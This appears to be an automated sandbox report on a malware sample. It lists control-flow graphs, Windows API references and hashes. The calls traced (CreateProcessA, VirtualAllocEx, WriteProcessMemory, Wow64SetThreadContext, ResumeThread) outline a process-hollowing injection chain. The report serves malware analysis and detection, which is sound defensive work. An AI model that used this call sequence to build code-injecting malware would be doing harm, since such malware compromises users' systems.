23918->23913 23919->23913 23920->23913 23921->23913 23922->23913 23923->23913 23924->23913 23926 6c1a799 23925->23926 23982 6c17aa0 23926->23982 23986 6c17a98 23926->23986 23927 6c1a927 23990 6c17ce0 23930->23990 23994 6c17ce8 23930->23994 23931 6c1a6cf 23931->23899 23935 6c1a8fa 23934->23935 23937 6c17aa0 ResumeThread 23935->23937 23938 6c17a98 ResumeThread 23935->23938 23936 6c1a927 23937->23936 23938->23936 23940 6c1a6a5 23939->23940 23942 6c17ce0 WriteProcessMemory 23940->23942 23943 6c17ce8 WriteProcessMemory 23940->23943 23941 6c1adf1 23942->23941 23943->23941 23945 6c1aa8a 23944->23945 23946 6c1a912 23945->23946 23998 6c17b48 23945->23998 24002 6c17b50 23945->24002 23947 6c1ad95 23946->23947 23951 6c17aa0 ResumeThread 23946->23951 23952 6c17a98 ResumeThread 23946->23952 23947->23899 23948 6c1a927 23951->23948 23952->23948 23954 6c1a67c 23953->23954 23956 6c17ce0 WriteProcessMemory 23954->23956 23957 6c17ce8 WriteProcessMemory 23954->23957 23955 6c1a657 23955->23899 23956->23955 23957->23955 24006 6c17c20 23958->24006 24010 6c17c28 23958->24010 23959 6c1a7bd 23959->23899 23964 6c1a4ef 23962->23964 23963 6c1a530 23963->23899 23964->23963 24014 6c17f70 23964->24014 24018 6c17f69 23964->24018 24022 6c17dd0 23968->24022 24026 6c17dd8 23968->24026 23969 6c1a657 23969->23899 23974 6c17b50 Wow64SetThreadContext 23972->23974 23975 6c17b48 Wow64SetThreadContext 23972->23975 23973 6c1a897 23973->23899 23974->23973 23975->23973 23978 6c1a51a 23976->23978 23977 6c1a530 23977->23899 23978->23977 23980 6c17f70 CreateProcessA 23978->23980 23981 6c17f69 CreateProcessA 23978->23981 23979 6c1a62c 23979->23899 23980->23979 23981->23979 23983 6c17ae0 ResumeThread 23982->23983 23985 6c17b11 23983->23985 23985->23927 23987 6c17aa0 ResumeThread 23986->23987 23989 6c17b11 23987->23989 23989->23927 23991 6c17ce8 WriteProcessMemory 23990->23991 23993 6c17d87 23991->23993 23993->23931 23995 6c17d30 WriteProcessMemory 23994->23995 23997 6c17d87 23995->23997 23997->23931 23999 6c17b50 Wow64SetThreadContext 23998->23999 24001 6c17bdd 23999->24001 24001->23945 24003 6c17b95 Wow64SetThreadContext 24002->24003 24005 6c17bdd 24003->24005 24005->23945 24007 6c17c28 VirtualAllocEx 24006->24007 24009 6c17ca5 24007->24009 24009->23959 24011 6c17c68 VirtualAllocEx 24010->24011 24013 6c17ca5 24011->24013 24013->23959 24015 6c17ff9 CreateProcessA 24014->24015 24017 6c181bb 24015->24017 24019 6c17f70 CreateProcessA 24018->24019 24021 6c181bb 24019->24021 24023 6c17dd8 ReadProcessMemory 24022->24023 24025 6c17e67 24023->24025 24025->23969 24027 6c17e23 ReadProcessMemory 24026->24027 24029 6c17e67 24027->24029 24029->23969

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 294 c0cf90-c0d02f GetCurrentProcess 298 c0d031-c0d037 294->298 299 c0d038-c0d06c GetCurrentThread 294->299 298->299 300 c0d075-c0d0a9 GetCurrentProcess 299->300 301 c0d06e-c0d074 299->301 303 c0d0b2-c0d0cd call c0d578 300->303 304 c0d0ab-c0d0b1 300->304 301->300 307 c0d0d3-c0d102 GetCurrentThreadId 303->307 304->303 308 c0d104-c0d10a 307->308 309 c0d10b-c0d16d 307->309 308->309
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C0D01E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00C0D05B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C0D098
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C0D0F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: 1c519c07eee4955d562075080d0f75b74976dcfcef0f4a6cf080e3c93815d1ab
                                                                                                                    • Instruction ID: 3fa6424e34c5658065e6d0b404e3fc5713668b6bf3ebc11bd66e1e9501ffd629
                                                                                                                    • Opcode Fuzzy Hash: 1c519c07eee4955d562075080d0f75b74976dcfcef0f4a6cf080e3c93815d1ab
                                                                                                                    • Instruction Fuzzy Hash: 075166B0D003498FDB14DFAAD548BEEBBF1AF88314F20C469E419A72A0D7749985CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 316 c0cfa0-c0d02f GetCurrentProcess 320 c0d031-c0d037 316->320 321 c0d038-c0d06c GetCurrentThread 316->321 320->321 322 c0d075-c0d0a9 GetCurrentProcess 321->322 323 c0d06e-c0d074 321->323 325 c0d0b2-c0d0cd call c0d578 322->325 326 c0d0ab-c0d0b1 322->326 323->322 329 c0d0d3-c0d102 GetCurrentThreadId 325->329 326->325 330 c0d104-c0d10a 329->330 331 c0d10b-c0d16d 329->331 330->331
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C0D01E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00C0D05B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C0D098
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C0D0F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: f1376d790af5561e7b71b1cc77a57ca855d0d7f5c54ef342ae14d60ecf802b84
                                                                                                                    • Instruction ID: 08b049131a278b9416aecf0f4a9034504db7fd2e9cb70223fd2a950526e5dc91
                                                                                                                    • Opcode Fuzzy Hash: f1376d790af5561e7b71b1cc77a57ca855d0d7f5c54ef342ae14d60ecf802b84
                                                                                                                    • Instruction Fuzzy Hash: F55146B09003498FDB14DFAAD548BEEBBF1AF88314F20C459E419A72A0D774A984CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 360 6c17f69-6c18005 363 6c18007-6c18011 360->363 364 6c1803e-6c1805e 360->364 363->364 365 6c18013-6c18015 363->365 371 6c18060-6c1806a 364->371 372 6c18097-6c180c6 364->372 366 6c18017-6c18021 365->366 367 6c18038-6c1803b 365->367 369 6c18023 366->369 370 6c18025-6c18034 366->370 367->364 369->370 370->370 374 6c18036 370->374 371->372 373 6c1806c-6c1806e 371->373 380 6c180c8-6c180d2 372->380 381 6c180ff-6c181b9 CreateProcessA 372->381 375 6c18091-6c18094 373->375 376 6c18070-6c1807a 373->376 374->367 375->372 378 6c1807c 376->378 379 6c1807e-6c1808d 376->379 378->379 379->379 382 6c1808f 379->382 380->381 383 6c180d4-6c180d6 380->383 392 6c181c2-6c18248 381->392 393 6c181bb-6c181c1 381->393 382->375 385 6c180f9-6c180fc 383->385 386 6c180d8-6c180e2 383->386 385->381 387 6c180e4 386->387 388 6c180e6-6c180f5 386->388 387->388 388->388 390 6c180f7 388->390 390->385 403 6c18258-6c1825c 392->403 404 6c1824a-6c1824e 392->404 393->392 406 6c1826c-6c18270 403->406 407 6c1825e-6c18262 403->407 404->403 405 6c18250 404->405 405->403 409 6c18280-6c18284 406->409 410 6c18272-6c18276 406->410 407->406 408 6c18264 407->408 408->406 411 6c18296-6c1829d 409->411 412 6c18286-6c1828c 409->412 410->409 413 6c18278 410->413 414 6c182b4 411->414 415 6c1829f-6c182ae 411->415 412->411 413->409 417 6c182b5 414->417 415->414 417->417
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C181A6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 73e06e8d64436b77db30d6c208e08094d898baf002648f97fc0303e2c977a761
                                                                                                                    • Instruction ID: 187e6e754977214787fc8f1a247b0adc82bca830e14d43e0879ece78d528b6a1
                                                                                                                    • Opcode Fuzzy Hash: 73e06e8d64436b77db30d6c208e08094d898baf002648f97fc0303e2c977a761
                                                                                                                    • Instruction Fuzzy Hash: 35919C71D05659CFDF60CFA8C8407EEBBB2BF49310F1485A9E848AB240DB749A85DF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 418 6c17f70-6c18005 420 6c18007-6c18011 418->420 421 6c1803e-6c1805e 418->421 420->421 422 6c18013-6c18015 420->422 428 6c18060-6c1806a 421->428 429 6c18097-6c180c6 421->429 423 6c18017-6c18021 422->423 424 6c18038-6c1803b 422->424 426 6c18023 423->426 427 6c18025-6c18034 423->427 424->421 426->427 427->427 431 6c18036 427->431 428->429 430 6c1806c-6c1806e 428->430 437 6c180c8-6c180d2 429->437 438 6c180ff-6c181b9 CreateProcessA 429->438 432 6c18091-6c18094 430->432 433 6c18070-6c1807a 430->433 431->424 432->429 435 6c1807c 433->435 436 6c1807e-6c1808d 433->436 435->436 436->436 439 6c1808f 436->439 437->438 440 6c180d4-6c180d6 437->440 449 6c181c2-6c18248 438->449 450 6c181bb-6c181c1 438->450 439->432 442 6c180f9-6c180fc 440->442 443 6c180d8-6c180e2 440->443 442->438 444 6c180e4 443->444 445 6c180e6-6c180f5 443->445 444->445 445->445 447 6c180f7 445->447 447->442 460 6c18258-6c1825c 449->460 461 6c1824a-6c1824e 449->461 450->449 463 6c1826c-6c18270 460->463 464 6c1825e-6c18262 460->464 461->460 462 6c18250 461->462 462->460 466 6c18280-6c18284 463->466 467 6c18272-6c18276 463->467 464->463 465 6c18264 464->465 465->463 468 6c18296-6c1829d 466->468 469 6c18286-6c1828c 466->469 467->466 470 6c18278 467->470 471 6c182b4 468->471 472 6c1829f-6c182ae 468->472 469->468 470->466 474 6c182b5 471->474 472->471 474->474
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C181A6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: fd067b266fc129ad379950327f12e4a2990242edbae6e89ff8d3b47749eb7b20
                                                                                                                    • Instruction ID: 452653e058ee647a2e547e49fb212013ca0908197c201a54cad328dc58312fcf
                                                                                                                    • Opcode Fuzzy Hash: fd067b266fc129ad379950327f12e4a2990242edbae6e89ff8d3b47749eb7b20
                                                                                                                    • Instruction Fuzzy Hash: B4918C71D05659CFDF50CFA8C8407EEBBB2BF49310F1485A9E848AB240DB749A85DF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 475 c0ad08-c0ad17 476 c0ad43-c0ad47 475->476 477 c0ad19-c0ad26 call c0a02c 475->477 479 c0ad49-c0ad53 476->479 480 c0ad5b-c0ad9c 476->480 483 c0ad28 477->483 484 c0ad3c 477->484 479->480 486 c0ada9-c0adb7 480->486 487 c0ad9e-c0ada6 480->487 532 c0ad2e call c0af90 483->532 533 c0ad2e call c0afa0 483->533 484->476 488 c0adb9-c0adbe 486->488 489 c0addb-c0addd 486->489 487->486 492 c0adc0-c0adc7 call c0a038 488->492 493 c0adc9 488->493 491 c0ade0-c0ade7 489->491 490 c0ad34-c0ad36 490->484 494 c0ae78-c0af38 490->494 496 c0adf4-c0adfb 491->496 497 c0ade9-c0adf1 491->497 498 c0adcb-c0add9 492->498 493->498 525 c0af40-c0af6b GetModuleHandleW 494->525 526 c0af3a-c0af3d 494->526 501 c0ae08-c0ae11 call c0a048 496->501 502 c0adfd-c0ae05 496->502 497->496 498->491 506 c0ae13-c0ae1b 501->506 507 c0ae1e-c0ae23 501->507 502->501 506->507 508 c0ae41-c0ae45 507->508 509 c0ae25-c0ae2c 507->509 530 c0ae48 call c0b2a0 508->530 531 c0ae48 call c0b270 508->531 509->508 511 c0ae2e-c0ae3e call c0a058 call c0a068 509->511 511->508 513 c0ae4b-c0ae4e 516 c0ae50-c0ae6e 513->516 517 c0ae71-c0ae77 513->517 516->517 527 c0af74-c0af88 525->527 528 c0af6d-c0af73 525->528 526->525 528->527 530->513 531->513 532->490 533->490
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00C0AF5E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 6dc632d6725bd277fcba800f97b18f510caca9d5f7810ca0214328827bd0a7b1
                                                                                                                    • Instruction ID: cfa4eb73b7ab258068adb449e73a442b57df07c31e0431d80028383c44bb0f46
                                                                                                                    • Opcode Fuzzy Hash: 6dc632d6725bd277fcba800f97b18f510caca9d5f7810ca0214328827bd0a7b1
                                                                                                                    • Instruction Fuzzy Hash: BB714570A00B058FDB24DF2AC44175ABBF5FF88304F108A2DD49AD7A90DB75E949CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 534 c044b0-c059b9 CreateActCtxA 537 c059c2-c05a1c 534->537 538 c059bb-c059c1 534->538 545 c05a2b-c05a2f 537->545 546 c05a1e-c05a21 537->546 538->537 547 c05a40 545->547 548 c05a31-c05a3d 545->548 546->545 550 c05a41 547->550 548->547 550->550
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00C059A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 8cc3664c414dd86e9691feb3f8bc6569c211a7d5ae307065729890c87c431db4
                                                                                                                    • Instruction ID: 54aa0810a44fd2a0b0669e99d90be64765cb165421f438d5b64071e85c536b45
                                                                                                                    • Opcode Fuzzy Hash: 8cc3664c414dd86e9691feb3f8bc6569c211a7d5ae307065729890c87c431db4
                                                                                                                    • Instruction Fuzzy Hash: B14112B0C00719CFDB24DFAAC844B9EBBF5BF89304F20816AD418AB291DB756945CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 551 c058ec-c058ef 552 c058fc-c059b9 CreateActCtxA 551->552 554 c059c2-c05a1c 552->554 555 c059bb-c059c1 552->555 562 c05a2b-c05a2f 554->562 563 c05a1e-c05a21 554->563 555->554 564 c05a40 562->564 565 c05a31-c05a3d 562->565 563->562 567 c05a41 564->567 565->564 567->567
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00C059A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 1e72818047369390b19d5a6a1db5da6bc2f24f2edcd5d6e8df7b7e07deb73e64
                                                                                                                    • Instruction ID: 6797257bf63db42ec32ef3fa9975078e53ab198b99900918cdee7818348a3845
                                                                                                                    • Opcode Fuzzy Hash: 1e72818047369390b19d5a6a1db5da6bc2f24f2edcd5d6e8df7b7e07deb73e64
                                                                                                                    • Instruction Fuzzy Hash: EB4123B0D00719CFDB24CFA9C8447DEBBB5BF88304F24806AD418AB295DB755946CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 568 6c17ce0-6c17d36 571 6c17d46-6c17d85 WriteProcessMemory 568->571 572 6c17d38-6c17d44 568->572 574 6c17d87-6c17d8d 571->574 575 6c17d8e-6c17dbe 571->575 572->571 574->575
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C17D78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: d6ca68833b92ed3d4cd5d7a793251a7929ba63144bea19c8882b868860dacea0
                                                                                                                    • Instruction ID: ca013a67896b2695768c08df737f9258e3954931b889ba9099801802f54d8a35
                                                                                                                    • Opcode Fuzzy Hash: d6ca68833b92ed3d4cd5d7a793251a7929ba63144bea19c8882b868860dacea0
                                                                                                                    • Instruction Fuzzy Hash: 642148B19003599FCB10DFA9C885BEEBBF5FF88310F108429E959A7250C7789954CBA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 579 6c17ce8-6c17d36 581 6c17d46-6c17d85 WriteProcessMemory 579->581 582 6c17d38-6c17d44 579->582 584 6c17d87-6c17d8d 581->584 585 6c17d8e-6c17dbe 581->585 582->581 584->585
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C17D78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 7d1127ab32ca2e787afbccbd59ac17611a4ef800f3cd3832dbe1b25b7007b014
                                                                                                                    • Instruction ID: 40105441e395fd88781a0fe67bf7090e9d4ce61d85c66cb749b02b2f110e9850
                                                                                                                    • Opcode Fuzzy Hash: 7d1127ab32ca2e787afbccbd59ac17611a4ef800f3cd3832dbe1b25b7007b014
                                                                                                                    • Instruction Fuzzy Hash: 832157B190035D9FCB10DFA9C884BEEBBF5FF88310F108429E919A7250C7789954CBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 589 6c17b48-6c17b9b 592 6c17bab-6c17bdb Wow64SetThreadContext 589->592 593 6c17b9d-6c17ba9 589->593 595 6c17be4-6c17c14 592->595 596 6c17bdd-6c17be3 592->596 593->592 596->595
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C17BCE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: 91d20597ac8449fc80a41b1d81f121c7fb00feef2c17f87e361930cce7949fae
                                                                                                                    • Instruction ID: 76e9d875c0267cd1eb2f6f9a189140ed8ec4efe2baceaace940575b820392c24
                                                                                                                    • Opcode Fuzzy Hash: 91d20597ac8449fc80a41b1d81f121c7fb00feef2c17f87e361930cce7949fae
                                                                                                                    • Instruction Fuzzy Hash: 24213AB1D002099FDB10DFAAC485BEEBBF4EF89314F14842AD459A7240CB789985CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 600 6c17dd0-6c17e65 ReadProcessMemory 604 6c17e67-6c17e6d 600->604 605 6c17e6e-6c17e9e 600->605 604->605
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C17E58
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: 360cd76c23efeff0c5c5f68a62a3464a86558966a1c1aaaebbe2f095a91e6dbb
                                                                                                                    • Instruction ID: 3c1b7cf93402ee51e3614cbfa405d27ac721da7373b85501638689b55da22307
                                                                                                                    • Opcode Fuzzy Hash: 360cd76c23efeff0c5c5f68a62a3464a86558966a1c1aaaebbe2f095a91e6dbb
                                                                                                                    • Instruction Fuzzy Hash: BC2139B18003599FCB10DF9AC844AEEFBF5FF48310F10842AE959A7250C7349944CBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 609 c0d5e9-c0d684 DuplicateHandle 610 c0d686-c0d68c 609->610 611 c0d68d-c0d6aa 609->611 610->611
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C0D677
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 354ee24cfea1aec54b816084268b61f0d42e8c46b262b7ffc21ac75f11a92fff
                                                                                                                    • Instruction ID: 35ef7333a99ee80849cb0c710b2bf9f6fef40d45c9ae32e37407ad84f72f19e6
                                                                                                                    • Opcode Fuzzy Hash: 354ee24cfea1aec54b816084268b61f0d42e8c46b262b7ffc21ac75f11a92fff
                                                                                                                    • Instruction Fuzzy Hash: 3A21E4B5900258DFDB10CFAAD584ADEBFF5EB48310F14842AE918A7350C375A944CFA4
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C17E58
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: fd5c1851dd0c79fb5e227af5e42a2247c16e71d4c3b6b2e8dc557e16323467d0
                                                                                                                    • Instruction ID: 9c992f24c78b0317b32e793c301bdfe3c12e36752a706bd3d6da19f9d35f233b
                                                                                                                    • Opcode Fuzzy Hash: fd5c1851dd0c79fb5e227af5e42a2247c16e71d4c3b6b2e8dc557e16323467d0
                                                                                                                    • Instruction Fuzzy Hash: 802128B18003599FCB10DFAAC844ADEFBF5FF48310F108429E558A7250C7349944DBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 614 6c17b50-6c17b9b 616 6c17bab-6c17bdb Wow64SetThreadContext 614->616 617 6c17b9d-6c17ba9 614->617 619 6c17be4-6c17c14 616->619 620 6c17bdd-6c17be3 616->620 617->616 620->619
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C17BCE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: c9ed7808983b320990ad1f8341643b5c49c98db6178c0e6d217a7d963570cdd7
                                                                                                                    • Instruction ID: ce0bb1cf7ae6c5a7875d2d0933fec10e1325e3d547d1a0a1caece06c8a59e082
                                                                                                                    • Opcode Fuzzy Hash: c9ed7808983b320990ad1f8341643b5c49c98db6178c0e6d217a7d963570cdd7
                                                                                                                    • Instruction Fuzzy Hash: F42118B1D002098FDB10DFAAC4857EEBBF4EF89324F14842AD459A7240CB78A945CFA5
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C0D677
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: e22edfae4ecd8cc67ecf11c4dc118969f3c4363489ae8b8492d62e25072df657
                                                                                                                    • Instruction ID: 8205071b137bcd97004f9b683ac912d30ed0f5a56ed824bd9c5af010e7395840
                                                                                                                    • Opcode Fuzzy Hash: e22edfae4ecd8cc67ecf11c4dc118969f3c4363489ae8b8492d62e25072df657
                                                                                                                    • Instruction Fuzzy Hash: 4121C2B59002589FDB10CFAAD984ADEBBF8EB48320F14841AE958A7350D375A944CFA5
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C17C96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: e23d75b21742ffbff6ade0f950331f934b6315f4c79ec72ca1970b5d4c9af3b1
                                                                                                                    • Instruction ID: cca382aee551caadfb33419a8f44349e522d5825958a9a45b7ac103ae2074376
                                                                                                                    • Opcode Fuzzy Hash: e23d75b21742ffbff6ade0f950331f934b6315f4c79ec72ca1970b5d4c9af3b1
                                                                                                                    • Instruction Fuzzy Hash: 481159B1800248DFCB20DFAAC845ADFBFF5EF89320F108419E959A7250C7359940DFA5
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C17C96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
